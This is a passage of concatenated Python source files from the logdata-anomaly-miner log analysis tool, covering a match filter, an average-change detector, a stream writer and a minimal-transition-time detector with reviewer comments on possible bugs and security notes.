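            if len(res) < histogram_mapping[1].total_elements:
                res = [''] * histogram_mapping[1].total_elements
            for line in histogram_mapping[1].to_string(' ').split('\n'):
                report_str += os.linesep + f'{line}'
            if len(res) > 0:
                res[0] = report_str
            # No-op: path was already removed by pop() above.
            all_path_set.discard(path)
            h.append(d)
        analysis_component['MissingPaths'] = list(histogram_mapping[0])
        analysis_component['HistogramData'] = h
        analysis_component['ReportInterval'] = self.report_interval
        analysis_component['ResetAfterReportFlag'] = self.reset_after_report_flag
        event_data = {'AnalysisComponent': analysis_component}
        if self.reset_after_report_flag:
            # NOTE(review): only the histogram of the last group popped above is reset; the other groups keep their counts across
            # reports — confirm whether all groups should be reset like in HistogramAnalysis.send_report.
            histogram_mapping[1].reset()
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Histogram report', res, event_data, log_atom, self)
        self.last_report_time = timestamp
        self.next_report_time = timestamp + self.report_interval
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__)
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/MatchFilter.py000066400000000000000000000075301437606560100336130ustar00rootroot00000000000000
"""This module defines a filter for parsed paths and values.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.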
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""

from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig


class MatchFilter(AtomHandlerInterface):
    """Emit a 'Log Atom Filtered' event for every atom that contains one of the configured paths (and, optionally, values)."""

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, target_value_list=None, output_logline=True):
        """
        Initialize the detector.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined
        occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_value_list if not None, only match log atom if the match value is contained in the list.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        """
        # avoid "defined outside init" issue
        self.next_persist_time, self.log_success, self.log_total = [None] * 3
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            target_value_list=target_value_list, output_logline=output_logline
        )
        # This component has no state worth persisting.
        self.persistence_id = 'Not persisted'

    def receive_atom(self, log_atom):
        """
        Forward all log atoms that involve specified path and optionally value.
        One event is emitted per matching (path, value) pair; a path whose match is a list yields one event per list element.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        for target_path in self.target_path_list:
            found = match_dict.get(target_path)
            if found is None:
                continue
            candidates = found if isinstance(found, list) else [found]
            for candidate in candidates:
                value = candidate.match_object
                if isinstance(value, bytes):
                    value = value.decode(AminerConfig.ENCODING)
                if self.target_value_list is not None and value not in self.target_value_list:
                    continue
                # Fall back to the repr of the raw bytes when the line is not valid in the configured encoding.
                try:
                    raw_text = log_atom.raw_data.decode(AminerConfig.ENCODING)
                except UnicodeError:
                    raw_text = repr(log_atom.raw_data)
                prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                event_data = {'AnalysisComponent': {
                    'AffectedLogAtomPaths': [target_path], 'AffectedLogAtomValues': [str(value)]}}
                sorted_log_lines = [prefix + raw_text]
                for listener in self.anomaly_event_handlers:
                    listener.receive_event(
                        f'Analysis.{self.__class__.__name__}', 'Log Atom Filtered', sorted_log_lines, event_data, log_atom, self)
                self.log_success += 1
MatchValueAverageChangeDetector.py000066400000000000000000000254751437606560100374640ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""
This module defines a detector that reports diverges from an average.
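This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GN General Public License along with this program. If not, see .
"""
import time
import os
import logging
from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class MatchValueAverageChangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """
    This detector calculates the average of a given list of values to monitor.
    Reports are generated if the average of the latest diverges significantly from the values observed before.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, timestamp_path, target_path_list, min_bin_elements, min_bin_time,
                 debug_mode=False, persistence_id='Default', output_logline=True):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param timestamp_path if not None, use this path value for timestamp based bins.
        @param target_path_list parser paths of values to be analyzed.
        Multiple paths mean that all values occurring in these paths are considered for value range generation.
        @param min_bin_elements evaluate the latest bin only after at least that number of elements was added to it.
        @param min_bin_time evaluate the latest bin only when the first element is received after min_bin_time has elapsed.
        @param debug_mode if true, generate an analysis report even when average of last bin was within expected range.
        @param persistence_id name of persistence file.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        """
        # avoid "defined outside init" issue
        self.next_persist_time, self.log_success, self.log_total = [None] * 3
        super().__init__(
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, timestamp_path=timestamp_path,
            target_path_list=target_path_list, min_bin_elements=min_bin_elements, min_bin_time=min_bin_time, debug_mode=debug_mode,
            persistence_id=persistence_id, output_logline=output_logline
        )
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        # One (path, stat_data) pair per target path; stat_data is filled by update() (see there for the layout).
        self.stat_data = [(path, [],) for path in target_path_list]
        if persistence_data is not None:
            for val in persistence_data:
                if isinstance(val, str):
                    # Legacy format: the whole (path, values) pair was stored as one string.
                    # NOTE(review): values stays a str here and is appended character by character below — confirm this format is
                    # still produced anywhere.
                    val = val.strip('[').strip(']').split(',', 2)
                    path = val[0].strip('"')
                    values = val[1].strip(' ').strip('[').strip(']')
                else:
                    path = val[0]
                    values = val[1]
                for known_path, stat_values in self.stat_data:
                    if known_path == path:
                        stat_values.extend(values)
                        break
                else:
                    # Persisted data for a path that is no longer configured used to raise an IndexError; skip it instead.
                    logging.getLogger(DEBUG_LOG_NAME).debug(
                        "%s ignores persisted data for unknown path %s.", self.__class__.__name__, path)

    def receive_atom(self, log_atom):
        """
        Add the atom's values to the statistics and send a summary to all event handlers once every bin is ready for analysis.
        Atoms without the configured timestamp_path (if any) are ignored.
        """
        self.log_total += 1
        parser_match = log_atom.parser_match
        value_dict = parser_match.get_match_dictionary()

        timestamp_value = log_atom.get_timestamp()
        if self.timestamp_path is not None:
            match_value = value_dict.get(self.timestamp_path)
            if match_value is None:
                return
            timestamp_value = match_value.match_object

        analysis_summary = ''
        ready_for_analysis_flag = True
        for (path, stat_data) in self.stat_data:
            match = value_dict.get(path)
            if match is None:
                data = None
            elif isinstance(match, list):
                # NOTE(review): a list reaches update() unchanged, where it is subtracted from the first value — confirm list
                # matches are expected for these paths.
                data = [m.match_object for m in match]
            else:
                data = match.match_object
            # update() has to run for every path so that no value is lost; the readiness flag is combined afterwards. The previous
            # "flag and self.update(...)" short-circuited and skipped the update of all later paths once one path was not ready.
            bin_ready = self.update(stat_data, timestamp_value, data)
            ready_for_analysis_flag = ready_for_analysis_flag and bin_ready

        if ready_for_analysis_flag:
            anomaly_scores = []
            for (path, stat_data) in self.stat_data:
                analysis_data = self.analyze(stat_data)
                if analysis_data is not None:
                    # analysis_data: [summary text, new n, new avg, new var, old n, old avg, old var]
                    d = {'Path': path}
                    a = {}
                    new = {'N': analysis_data[1], 'Avg': analysis_data[2], 'Var': analysis_data[3]}
                    old = {'N': analysis_data[4], 'Avg': analysis_data[5], 'Var': analysis_data[6]}
                    a['New'] = new
                    a['Old'] = old
                    d['AnalysisData'] = a
                    if analysis_summary == '':
                        analysis_summary += f'"{path}": {analysis_data[0]}'
                    else:
                        analysis_summary += os.linesep
                        analysis_summary += f' "{path}": {analysis_data[0]}'
                    anomaly_scores.append(d)
            analysis_component = {'AffectedLogAtomPaths': list(value_dict), 'AnomalyScores': anomaly_scores,
                                  'MinBinElements': self.min_bin_elements, 'MinBinTime': self.min_bin_time, 'DebugMode': self.debug_mode}
            event_data = {'AnalysisComponent': analysis_component}
            if analysis_summary:
                # A non-empty summary implies stat_data is non-empty; the number of log line slots follows the element count of the
                # merged reference bin of the last path (stat_data[2] is set by analyze()).
                _, last_stat_data = self.stat_data[-1]
                res = [''] * last_stat_data[2][0]
                res[0] = analysis_summary
                for listener in self.anomaly_event_handlers:
                    listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Statistical data report', res, event_data, log_atom, self)
        self.log_success += 1

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.
        @return the number of seconds until the next check.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage: the whole stat_data list is stored as JSON."""
        PersistenceUtil.store_json(self.persistence_file_name, self.stat_data)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def update(self, stat_data, timestamp_value, value):
        """
        Update the collected statistics data.
        stat_data layout: [timestamp of the first value, first value k, old bin (n, sum, sum2, avg, variance) or None,
        current bin (n, sum, sum2)]; sums are accumulated over (value - k).
        @param value the new value; when None, nothing is added and only the readiness conditions are checked.
        @return true if the bin is full enough to perform an analysis.
        """
        if value is not None:
            if not stat_data:
                # Append timestamp, k-value, old-bin (n, sum, sum2, avg, variance),
                # current-bin (n, sum, sum2)
                stat_data.append(timestamp_value)
                stat_data.append(value)
                stat_data.append(None)
                stat_data.append((1, 0.0, 0.0,))
            else:
                delta = value - stat_data[1]
                bin_values = stat_data[3]
                stat_data[3] = (bin_values[0] + 1, bin_values[1] + delta, bin_values[2] + delta * delta)

        if not stat_data:
            return False
        if stat_data[3][0] < self.min_bin_elements:
            return False
        if self.timestamp_path is not None:
            # NOTE(review): stat_data[0] is the timestamp of the very first value and is never advanced, so this condition only
            # delays the first analysis — confirm intended.
            return timestamp_value - stat_data[0] >= self.min_bin_time
        return True

    def analyze(self, stat_data):
        """
        Perform the analysis and progress from the last bin to the next one.
        @return None when statistical data was as expected and debugging is disabled, else a list
        [summary text, new n, new avg, new var, old n, old avg, old var].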
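"""
        logging.getLogger(DEBUG_LOG_NAME).debug("%s performs analysis.", self.__class__.__name__)
        # stat_data layout (see update): [first timestamp, offset value k, old bin (n, sum, sum2, avg, variance) or None,
        # current bin (n, sum, sum2)]; the sums are over deltas from k, so k is added back whenever an average is reported.
        current_bin = stat_data[3]
        if current_bin[0] == 0:
            # Nothing accumulated (possible with min_bin_elements <= 0 right after a bin change); avoid dividing by zero.
            return None
        current_average = current_bin[1] / current_bin[0]
        # The sample variance needs at least two elements; with min_bin_elements <= 1 a single-element bin raised ZeroDivisionError.
        if current_bin[0] > 1:
            current_variance = (current_bin[2] - (current_bin[1] * current_bin[1]) / current_bin[0]) / (current_bin[0] - 1)
        else:
            current_variance = 0.0
        old_bin = stat_data[2]
        if old_bin is None:
            # First completed bin: it becomes the reference, there is nothing to compare against yet.
            stat_data[2] = (current_bin[0], current_bin[1], current_bin[2], current_average, current_variance,)
            stat_data[3] = (0, 0.0, 0.0)
            if self.debug_mode:
                # Same shape as the "Change" result below, because receive_atom indexes elements 1..6 (the former plain string
                # made it report single characters as N/Avg/Var); there is no old bin yet.
                return [f'Initial: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}',
                        current_bin[0], current_average + stat_data[1], current_variance, 0, None, None]
            return None
        total_n = old_bin[0] + current_bin[0]
        total_sum = old_bin[1] + current_bin[1]
        total_sum2 = old_bin[2] + current_bin[2]
        # Merge the current bin into the reference before comparing, so the reference keeps growing (total_n >= 2 here).
        stat_data[2] = (
            total_n, total_sum, total_sum2, total_sum / total_n, (total_sum2 - (total_sum * total_sum) / total_n) / (total_n - 1))
        stat_data[3] = (0, 0.0, 0.0)
        # NOTE(review): the shift of the average is compared against the old variance (old_bin[4]), not a standard deviation —
        # confirm intended.
        if (current_variance > 2 * old_bin[4]) or (abs(current_average - old_bin[3]) > old_bin[4]) or self.debug_mode:
            return [f'Change: new: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}; old: n = '
                    f'{old_bin[0]}, avg = {old_bin[3] + stat_data[1]}, var = {old_bin[4]}',
                    current_bin[0], current_average + stat_data[1], current_variance, old_bin[0], old_bin[3] + stat_data[1], old_bin[4]]
        return None
MatchValueStreamWriter.py000066400000000000000000000073021437606560100357310ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""
This module defines a writer that forwards match information to a stream.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.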
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface
import _io


class MatchValueStreamWriter(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """
    This class extracts values from a given match and writes them to a stream.

    This can be used to forward these values to another program (when stream is a wrapped network socket) or to a file for further
    analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time, add the writer
    object also to the time trigger list.

    Output format (see receive_atom): one record per log atom, the match strings of target_path_list joined by separator and
    terminated by a newline. Values are written verbatim, without any escaping or quoting. A match value that itself contains the
    separator or a newline therefore breaks the record framing for whatever consumes the stream; consumers that parse this output
    must not assume the field count per record is fixed when the values originate from untrusted log data.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, stream, target_path_list: list, separator: bytes, missing_value_string: bytes):
        """
        Initialize the writer.

        @param stream the stream on which the match results are written. A _io.BytesIO receives bytes records; any other stream
        receives str records (the bytes decoded as ASCII with non-ASCII bytes dropped, see receive_atom).
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
        are considered for value range generation.
        @param separator a bytes string to be added between match values in the output stream.
        @param missing_value_string a bytes string which is added if no match was found.
        """
        # avoid "defined outside init" issue
        self.log_success, self.log_total = [None]*2
        # NOTE(review): receive_atom() increments both counters; they are presumably reset to 0 by the base class
        # __init__ via the keyword arguments below — confirm against AtomHandlerInterface.
        super().__init__(stream=stream, target_path_list=target_path_list, separator=separator, missing_value_string=missing_value_string)

    def receive_atom(self, log_atom) -> None:
        """
        Forward match value information to the stream.

        For every path in target_path_list the match string(s) found in the parser match are appended, joined by separator;
        missing_value_string stands in for a path that did not match. A list match contributes all its match strings, again
        separator-joined. Nothing is written when no path matched at all. Match values are written without escaping (see the
        class docstring).
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        add_sep_flag = False
        contains_data = False
        result = b''
        for path in self.target_path_list:
            if add_sep_flag:
                result += self.separator
            match = match_dict.get(path)
            if match is None:
                result += self.missing_value_string
            else:
                matches = []
                if isinstance(match, list):
                    matches = match
                else:
                    matches.append(match)
                # Every match string is followed by a separator; the trailing one is cut again below.
                for match in matches:
                    result += match.match_string + self.separator
                    contains_data = True
                if len(self.separator) > 0:
                    result = result[:-len(self.separator)]
            add_sep_flag = True
        if contains_data:
            if not isinstance(self.stream, _io.BytesIO):
                # Text stream: the record is decoded as ASCII and non-ASCII bytes are silently dropped ('ignore'),
                # so the written record can be lossy.
                self.stream.write(result.decode('ascii', 'ignore'))
                self.stream.write('\n')
            else:
                self.stream.write(result)
                self.stream.write(b'\n')
            self.log_success += 1

    def do_timer(self, _trigger_time) -> int:
        """Flush the stream; called from the time trigger list. @return the delay (10) until the next call."""
        self.stream.flush()
        return 10

    def do_persist(self) -> None:
        """Flush the stream; this writer keeps no persistence data of its own."""
        self.stream.flush()
MinimalTransitionTimeDetector.py000066400000000000000000000772561437606560100373140ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""
This module defines a detector for minimal transition times between states (e.g. value combinations of stated paths).

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
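See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import os
import logging
import sys
import time

from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX,\
    KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class MinimalTransitionTimeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface):
    """
    This class creates events when minimal transition times between states (e.g. value combinations of stated paths) are undercut.

    Model: self.time_matrix is a sparse, unordered "matrix" self.time_matrix[state_a][state_b] holding the smallest observed
    difference of log_atom.atom_time between two consecutive, different states of the same id. Each unordered pair of states is
    stored in exactly one orientation, so every lookup tries both orientations (see _find_entry). A state is the tuple of the
    values at target_path_list, an id the tuple of the values at id_path_list.

    Operational / security notes:
    - While learn_mode is True every undercut transition lowers the stored minimum. Whoever can influence the log stream can thus
      gradually "teach" smaller minima and silence later alerts; disable learn_mode (or use the stop_learning_* parameters) once a
      baseline exists.
    - The number of states is not bounded. With learn_mode enabled, log-controlled value combinations grow the matrix, and with it
      the cost of solidify_matrix() (roughly pairs x states per pass), without limit.
    - The persistence file and the *_persistence_event() remote-control operations define the model directly and are not
      validated beyond their shape; they must only be writable by trusted operators.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, id_path_list=None, ignore_list=None,
                 allow_missing_id=False, num_log_lines_solidify_matrix=100, time_output_threshold=0, anomaly_threshold=0.05,
                 persistence_id='Default', learn_mode=False, output_logline=True, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_path_list parser paths whose combined values define a state. Must not be empty: an empty list only logs a
        warning here and makes receive_atom() ignore every log atom.
        @param id_path_list the list of paths where id values can be stored in all relevant log event types. Transitions are
        tracked separately per combination of id values. Must not be empty (handled like target_path_list).
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are
        omitted. The default value is [] as None is not iterable.
        @param allow_missing_id if True, a path of target_path_list or id_path_list that is missing in a log atom is replaced by an
        empty string placeholder; if False, log atoms missing one of these paths are omitted.
        @param num_log_lines_solidify_matrix number of processed log lines after which the matrix is solidified (see
        solidify_matrix). This process is periodically repeated.
        @param time_output_threshold a stored minimal transition time has to exceed this threshold before an undercut of it is
        reported or learned.
        @param anomaly_threshold threshold for the confidence (1 - observed time / stored minimal time) which must be exceeded to
        raise an anomaly.
        @param persistence_id name of persistence file.
        @param learn_mode specifies whether newly observed transitions and undercut transition times should be added to the
        learned model.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            mutable_default_args=["target_path_list", "id_path_list", "ignore_list"], aminer_config=aminer_config,
            anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, id_path_list=id_path_list,
            ignore_list=ignore_list, allow_missing_id=allow_missing_id, num_log_lines_solidify_matrix=num_log_lines_solidify_matrix,
            time_output_threshold=time_output_threshold, anomaly_threshold=anomaly_threshold, persistence_id=persistence_id,
            learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )

        # Both path lists are required. The misconfiguration is only reported; receive_atom() then drops every log atom.
        if [] in (self.target_path_list, self.id_path_list):
            msg = 'Both target_path_list and id_path_list must not be empty.'
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            print('WARNING: ' + msg, file=sys.stderr)

        # Learned model and per-id tracking state.
        self.time_matrix = {}  # {state_a: {state_b: minimal transition time}}, one orientation per pair
        self.last_value = {}   # id tuple -> last state seen for that id
        self.last_time = {}    # id tuple -> atom_time at which that state was seen
        self.log_total = 0
        # Paths recorded by allowlist_event(). Initialised here so that call does not fail with an AttributeError; note that
        # receive_atom() does not consult this list, so allowlisting currently only records the path.
        self.constraint_list = []

        # Load persistence. The file content is trusted as-is and unpacked without structural validation.
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            # Layout written by do_persist(): [matrix rows, row keys, column keys per row]. Keys come back as lists from JSON.
            return_matrix, row_keys, column_keys = persistence_data[0], persistence_data[1], persistence_data[2]
            self.time_matrix = {
                tuple(row_key): {tuple(column_key): return_matrix[i][j] for j, column_key in enumerate(column_keys[i])}
                for i, row_key in enumerate(row_keys)}

    def _combine_values(self, match_dict, path_list):
        """
        Build the tuple of values found at path_list in match_dict.

        Bytes values are decoded with AminerConfig.ENCODING. A missing path yields an empty string placeholder when
        allow_missing_id is True.
        @return the value tuple, or None when a path is missing and allow_missing_id is not True.
        """
        values = ()
        for path in path_list:
            match = match_dict.get(path)
            if match is None:
                if self.allow_missing_id is not True:
                    return None
                values += ('',)
            elif isinstance(match.match_object, bytes):
                values += (match.match_object.decode(AminerConfig.ENCODING),)
            else:
                values += (match.match_object,)
        return values

    def _find_entry(self, value_1, value_2):
        """
        Look up the orientation under which a transition time between value_1 and value_2 is stored.

        @return the key pair (row, column) into self.time_matrix, trying (value_1, value_2) first, or None if neither
        orientation exists.
        """
        if value_1 in self.time_matrix and value_2 in self.time_matrix[value_1]:
            return value_1, value_2
        if value_2 in self.time_matrix and value_1 in self.time_matrix[value_2]:
            return value_2, value_1
        return None

    def _postpone_stop_learning(self):
        """Push the automatic end of learn_mode back by stop_learning_no_anomaly_time after the model was just changed."""
        if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
            self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source and analyze minimal times between transitions.

        The state of the atom is compared with the previous state of the same id. A first appearance of the pair is reported
        (and learned in learn_mode); an observed time below the stored minimum that exceeds time_output_threshold is reported when
        the confidence exceeds anomaly_threshold, and lowers the stored minimum in learn_mode. Non-ascending timestamps for an id
        are reported as an order anomaly with confidence 1.
        @return True if the atom was processed, False if it was skipped (missing configuration, ignored path, missing atom_time
        or missing required path).
        """
        # Do not analyze the log line if target_path_list or id_path_list is empty
        if [] in (self.target_path_list, self.id_path_list):
            return False
        match_dict = log_atom.parser_match.get_match_dictionary()
        # Skip paths from ignore list.
        if any(ignore_path in match_dict for ignore_path in self.ignore_list):
            return False
        # Skip line if atom_time is not defined.
        if log_atom.atom_time is None:
            return False
        # End learn_mode once the stop learning time was reached (same check as in MissingMatchPathValueDetector; without it
        # the stop_learning_* parameters only ever postponed the timestamp and never ended learning).
        if self.learn_mode is True and self.stop_learning_timestamp is not None and self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Every non-skipped line counts, even if it is dropped below for a missing path.
        self.log_total += 1
        if self.log_total % self.num_log_lines_solidify_matrix == 0:
            self.solidify_matrix()

        event_value = self._combine_values(match_dict, self.target_path_list)
        if event_value is None:
            return False
        id_tuple = self._combine_values(match_dict, self.id_path_list)
        if id_tuple is None:
            return False

        current_time = log_atom.atom_time
        if id_tuple not in self.last_value:
            # First state for this id: nothing to compare against yet.
            self.last_value[id_tuple] = event_value
            self.last_time[id_tuple] = current_time
            return True

        previous_value = self.last_value[id_tuple]
        previous_time = self.last_time[id_tuple]
        # Same state again: only move the reference time forward.
        if previous_value == event_value:
            self.last_time[id_tuple] = current_time
            return True

        elapsed = current_time - previous_time
        # Timestamps running backwards for one id are reported and the line is otherwise ignored.
        if elapsed < 0:
            additional_information = {'AffectedLogAtomValues': [list(previous_value), list(event_value)],
                                      'AffectedIdValues': list(id_tuple), 'PreviousTime': previous_time, 'NewTime': current_time}
            self.print(f'Anomaly in log line order: {list(previous_value)} - {list(event_value)} ({list(id_tuple)}): '
                       f'{previous_time} - {current_time}', log_atom, self.target_path_list, confidence=1,
                       additional_information=additional_information)
            return True

        entry = self._find_entry(event_value, previous_value)
        if entry is None:
            # Unknown pair of states. The row is created even without learn_mode; the time is only stored in learn_mode.
            if event_value not in self.time_matrix:
                self.time_matrix[event_value] = {}
            additional_information = {'AffectedLogAtomValues': [list(previous_value), list(event_value)],
                                      'AffectedIdValues': list(id_tuple), 'NewMinimalTime': elapsed}
            message = f'First Appearance: {list(previous_value)} - {list(event_value)} ({list(id_tuple)}), {elapsed}'
            self.print(message, log_atom, self.target_path_list, additional_information=additional_information)
            if self.learn_mode:
                self.time_matrix[event_value][previous_value] = elapsed
                self._postpone_stop_learning()
        else:
            key_1, key_2 = entry
            minimal_time = self.time_matrix[key_1][key_2]
            # Undercut of a known minimum that is large enough to be of interest. minimal_time > elapsed >= 0 here, so the
            # division below cannot hit zero.
            if minimal_time > elapsed and minimal_time > self.time_output_threshold:
                confidence = 1 - elapsed / minimal_time
                if confidence > self.anomaly_threshold:
                    additional_information = {'AffectedLogAtomValues': [list(previous_value), list(event_value)],
                                              'AffectedIdValues': list(id_tuple), 'PreviousMinimalTime': minimal_time,
                                              'NewMinimalTime': elapsed}
                    message = f'Undercut transition time: {list(previous_value)} - {list(event_value)} ({list(id_tuple)}),' \
                              f' {minimal_time} -> {elapsed}'
                    self.print(message, log_atom, self.target_path_list, confidence=confidence,
                               additional_information=additional_information)
                if self.learn_mode:
                    self.time_matrix[key_1][key_2] = elapsed
                    self._postpone_stop_learning()

        # Update the last_value and time
        self.last_value[id_tuple] = event_value
        self.last_time[id_tuple] = current_time
        return True

    def solidify_matrix(self):
        """
        Solidify the minimal time matrix with the triangle inequality.

        For every stored transition (a, b) and every other state v, the path a-b-v (or v-a-b) bounds the minimal time of the
        missing leg: whenever time(a, v) + time(a, b) is smaller than the stored time(b, v) (or that entry does not exist yet),
        it is lowered to that sum, and the same for time(a, v) via b. Entries created this way use the orientation
        (v, other state). Relaxation is repeated until no entry changes any more; each pass costs about pairs x states lookups.
        """
        # Initialize list old_pairs with all transitions and a list of all values
        # The list of old_pairs includes the minimal times which can be used to reduce the minimal transition times of other transitions
        values = list(self.time_matrix.keys())
        for key1 in self.time_matrix:
            values += [key for key in self.time_matrix[key1] if key not in values]
        old_pairs = [[key1, key2] for key1 in self.time_matrix for key2 in self.time_matrix[key1]]

        # Check the triangle inequality as long as values are corrected
        while len(old_pairs) > 0:
            new_pairs = []
            for old_pair in old_pairs:
                # Check triangle inequality value - old_pair[0] - old_pair[1] > value - old_pair[1] and
                # old_pair[0] - old_pair[1] - value > value - old_pair[0]
                for value in values:
                    if value in (old_pair[0], old_pair[1]):
                        continue

                    # Check value - old_pair[0] - old_pair[1] > value - old_pair[1]
                    if (old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]) or (
                            value in self.time_matrix and old_pair[0] in self.time_matrix[value]):
                        if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]:
                            key_1_1 = old_pair[0]
                            key_1_2 = value
                        else:
                            key_1_1 = value
                            key_1_2 = old_pair[0]

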